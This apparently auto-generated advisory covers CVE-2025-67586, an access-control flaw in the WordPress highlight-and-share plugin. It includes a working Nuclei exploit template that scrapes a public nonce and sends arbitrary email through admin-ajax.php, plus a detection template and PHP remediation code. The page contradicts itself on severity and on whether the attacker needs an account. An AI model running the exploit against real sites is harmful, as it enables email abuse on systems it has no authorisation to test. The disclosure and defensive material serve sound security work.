[webapps] WordPress Plugin 5.2.0 - Broken Access Control
CVE-2025-67586
WordPress Plugin 5.2.0 access control bypass vulnerability
High · CVSS 7.5

📋 Basic Vulnerability Information
| CVE | CVE-2025-67586 |
|---|---|
| Vulnerability type | Broken Access Control |
| Affected version | WordPress Plugin 5.2.0 |
| Severity | High · CVSS 7.5 |
| Published | 2026-04-22 |
| Submitter | Zeeshan Haider |
| Source | Exploit-DB (original entry) |
🔬 Root Cause
The plugin lacks effective capability checks or nonce verification on sensitive operation endpoints and relies on untrusted user input for authorization decisions, allowing low-privilege users to perform functions that require higher privileges.
🎯 Attack Scenario
1. The attacker has a subscriber or lower-privileged account.
2. The attacker sends a crafted request to the flawed AJAX/REST endpoint containing the parameters of the target operation.
3. The server does not verify that the current user is authorized for the requested operation and executes it directly.
4. The attacker modifies or accesses administrator-only functionality, such as changing settings or exporting data.
💥 Impact
Privilege escalation, unauthorized data access and modification, and sensitive information disclosure; in severe cases, complete site takeover.
⚔️ Nuclei Exploit Template
The following is an exploitation template in standard Nuclei v3 format that can be used directly for vulnerability verification:
```yaml
id: CVE-2025-67586-exploit

info:
  name: WordPress Plugin highlight-and-share <= 5.2.0 - Broken Access Control Exploit
  author: Zeeshan Haider
  severity: medium
  description: |
    This exploit sends an unauthenticated email using the highlight-and-share plugin's AJAX endpoint.
    It first extracts a valid nonce and post ID from a public WordPress post, then reuses them to send arbitrary emails.
  reference:
    - https://www.exploit-db.com/
  tags: wordpress,cve,cve2025,unauth

# Note: sending unauthorized email may lead to abuse; use only in authorized testing
variables:
  post_url: "{{BaseURL}}/?p=1" # default test post; can be overridden by the user
  to_email: "attacker@example.com"
  subject: "PoC"
  share_text: "Poc test"

http:
  - raw:
      - |
        GET {{post_url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

    extractors:
      # Extract post_id: usually found in the article element's id or data-post_id attribute
      - type: regex
        part: body
        name: post_id
        internal: true
        regex:
          - 'post-(\d+)'
      # Also try to extract it from the URL parameter
      - type: regex
        part: body
        name: post_id
        internal: true
        regex:
          - '\?p=(\d+)'
        group: 1
      # Extract the nonce: try several possible JS variables or data attributes
      - type: regex
        part: body
        name: has_email_nonce
        internal: true
        regex:
          - 'hasEmailNonce[\s]*[:=][\s]*["\']([a-f0-9]+)["\']'
        group: 1
      - type: regex
        part: body
        name: has_email_nonce
        internal: true
        regex:
          - 'data-nonce=["\']([a-f0-9]+)["\']'
        group: 1
      - type: regex
        part: body
        name: has_email_nonce
        internal: true
        regex:
          - '_wpnonce=([a-f0-9]+)'
        group: 1
    # If extraction fails, fall back to a user-supplied nonce and post_id (can be overridden via variables);
    # here we proceed to the second step regardless, which may fail if the variables are missing

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

        action=has_email_form_submission&formData[postId]={{post_id}}&formData[permalink]={{BaseURL}}/?p={{post_id}}&formData[nonce]={{has_email_nonce}}&formData[toEmail]={{to_email}}&formData[subject]={{subject}}&formData[shareText]={{share_text}}&formData[emailShareType]=selection

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"message_title"'
          - '"This post has been shared!"'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.message_body"
          - ".data.message_subject"
        name: exploit_result
```

🔍 Nuclei Detection Template
The following is a detection template used to determine whether a target is affected:
```yaml
id: CVE-2025-67586-detection

info:
  name: WordPress Plugin highlight-and-share <= 5.2.0 - Broken Access Control Detection
  author: Zeeshan Haider
  severity: medium
  description: |
    A broken access control vulnerability exists in the highlight-and-share plugin for WordPress.
    This template detects if the vulnerable version of the plugin is installed by checking the readme.txt file.
  reference:
    - https://www.exploit-db.com/
  tags: wordpress,cve,cve2025

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/highlight-and-share/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "highlight-and-share"
      # The version patterns live in one regex matcher with condition: or, so any
      # one of them satisfies it; as separate matchers under matchers-condition: and
      # they could never all match the same readme.txt at once.
      - type: regex
        part: body
        regex:
          - 'Stable tag:\s*5\.2\.0'
          # Also match versions below 5.2.0 (e.g. 5.1.x, 5.0.x)
          - 'Stable tag:\s*5\.\d+\.\d+' # matches 5.x.x; this also matches releases newer than 5.2.0, so confirm the version before concluding
          - 'Stable tag:\s*4\.\d+\.\d+' # matches 4.x.x (older versions)
        condition: or

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'Stable tag:\s*([0-9]+\.[0-9]+(\.[0-9]+)?)'
        internal: true
        name: plugin_version
```

🛡️ Remediation
Upgrade to a fixed version. If no patch is available, add current_user_can capability checks and wp_nonce verification to the affected functionality, and disable unused endpoints.
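The remediation above in code, as an added example that is not from the advisory or from the plugin: a constructed handler showing the root-cause pattern (an anonymously reachable AJAX action guarded only by a nonce that the public page itself exposes) next to a hardened version built on check_ajax_referer and current_user_can. All action, capability and field names are hypothetical.

```php
<?php
// Added example, not code from the advisory or the plugin. It contrasts the
// root-cause pattern above with a hardened handler; every action, capability
// and field name is hypothetical.
// Vulnerable pattern (constructed): registered for anonymous visitors, and the
// only "check" is a nonce the public page itself hands out, so anyone can replay it.
add_action( 'wp_ajax_nopriv_example_sensitive_op', 'example_sensitive_op_vulnerable' );
function example_sensitive_op_vulnerable() {
    $data = isset( $_POST['formData'] ) ? (array) $_POST['formData'] : array();
    if ( empty( $data['nonce'] ) || ! wp_verify_nonce( $data['nonce'], 'example_public_nonce' ) ) {
        wp_send_json_error( array( 'message' => 'Bad nonce.' ), 403 );
    }
    // ... privileged operation runs for whoever holds the public nonce ...
    wp_send_json_success();
}

// Hardened pattern: no wp_ajax_nopriv_ registration, so anonymous requests get
// WordPress's default "0" reply before this code runs.
add_action( 'wp_ajax_example_sensitive_op', 'example_sensitive_op_hardened' );
function example_sensitive_op_hardened() {
    // 1. CSRF: the nonce must have been minted for this action and this session.
    //    A nonce is not authorization; it only ties the request to a page we served.
    check_ajax_referer( 'example_sensitive_op', 'nonce' );
    // 2. Authorization: from the current user's server-side capability, never
    //    from anything in the request body (e.g. a role or user ID field).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    // 3. Validate input only after both checks pass.
    $post_id = isset( $_POST['postId'] ) ? absint( $_POST['postId'] ) : 0;
    if ( ! $post_id || ! get_post( $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid post.' ), 400 );
    }
    // ... privileged operation ...
    wp_send_json_success( array( 'post_id' => $post_id ) );
}

// Mint the nonce only in pages served to users allowed to perform the action,
// not in every public post.
add_action( 'admin_enqueue_scripts', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleData', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_sensitive_op' ),
    ) );
} );
```

The nonce minted here is tied to the logged-in session and is only emitted on admin pages, so scraping a public post yields nothing reusable, and even a valid nonce still fails the capability check.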
📎 References
⚠️ This article is based on public vulnerability databases and is intended only as a reference for security research and defense. Generated: 2026-05-06 17:40 | Source: Exploit-DB